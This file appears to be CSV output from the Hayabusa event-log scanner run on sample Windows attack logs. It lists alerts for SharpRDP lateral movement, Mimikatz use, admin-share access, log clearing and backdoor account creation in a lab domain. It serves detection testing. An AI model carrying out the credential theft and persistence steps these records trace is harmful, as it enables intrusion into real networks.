2020-07-10 05:58:11.981 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: ROOTDC1$ : Workstation: - : IP Address: fe80::1cae:5aa4:9d8d:106a : Port: 51370 : LogonID: 0x64f64a3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:58:12.004 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59643 : LogonID: 0x64f64ca,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:58:12.005 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59644 : LogonID: 0x64f64e1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:58:12.005 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59645 : LogonID: 0x64f64f3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 06:22:31.163 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx"
2020-07-10 06:25:41.773 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx"
2020-07-10 07:00:14.124 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:14.195 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:17.584 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:28.307 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:28.458 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:31.217 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:31.217 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:31.218 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:42.919 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:43.042 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:45.589 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:48.105 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: c:\windows\system32\notepad.exe : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:01:01.154 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:01:01.337 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:01:03.898 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:01:03.899 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:01:03.900 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:01:03.902 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:01:06.427 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:02:42.085 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:05:58.373 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:06:07.487 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:06:14.112 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:06:14.229 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:06:20.184 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:06:20.185 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:06:20.185 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:07:33.800 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 19:20:34.910 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: rdpclip : Path: C:\Windows\System32\rdpclip.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\System32\svchost.exe -k NetworkService -s TermService,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
2020-07-10 19:20:35.886 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
2020-07-10 19:20:35.913 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
2020-07-10 19:20:37.637 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""\\tsclient\c\temp\stack\a.exe"" : Path: \\tsclient\c\temp\stack\a.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
2020-07-10 19:20:58.942 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
2020-07-11 22:21:11.693 +09:00,wec02,70,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx
2020-07-11 22:21:11.693 +09:00,wec02,70,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx
2020-07-11 22:21:17.514 +09:00,wec02,70,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx
2020-07-11 22:21:17.514 +09:00,wec02,70,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx
2020-07-11 22:21:18.640 +09:00,wec02,70,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx
2020-07-11 22:21:18.640 +09:00,wec02,70,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx
2020-07-12 02:16:42.576 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx
2020-07-12 02:16:42.592 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx
2020-07-12 02:16:50.984 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx
2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx
2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx
2020-07-12 02:18:01.228 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx
2020-07-12 06:38:17.445 +09:00,fs02.offsec.lan,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by SMBexec (sups. arg.).evtx
2020-07-12 06:49:56.318 +09:00,fs02.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-Random service installation.evtx
2020-07-12 14:10:08.442 +09:00,rootdc1.offsec.lan,4720,medium,Local user account created,User: admin-kriss : SID:S-1-5-21-4230534742-2542757381-3142984815-1166,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-4726 Fast created-deleted user.evtx
2020-07-12 14:10:08.442 +09:00,rootdc1.offsec.lan,4720,medium,Local user account created,User: admin-kriss : SID:S-1-5-21-4230534742-2542757381-3142984815-1166,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Admin like user created.evtx
2020-07-12 14:12:58.295 +09:00,jump01.offsec.lan,4720,medium,Local user account created,User: hacking-local-acct : SID:S-1-5-21-1470532092-3758209836-3742276719-1001,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Local user created.evtx
2020-07-12 14:14:30.976 +09:00,jump01.offsec.lan,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-1470532092-3758209836-3742276719-1001 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-User added to local admin groups.evtx
2020-07-12 14:14:30.976 +09:00,jump01.offsec.lan,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-1470532092-3758209836-3742276719-1001 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-4733-Quick added-removed user from local group.evtx
2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=lambda-user,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1158 : Group: Group02",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx
2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=lambda-user,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1158 : Group: Group02 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx
2020-07-12 14:19:54.561 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group01",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.561 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group01 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.564 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group02",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.564 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group02 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group03",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group03 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.568 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group04",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.568 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group04 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
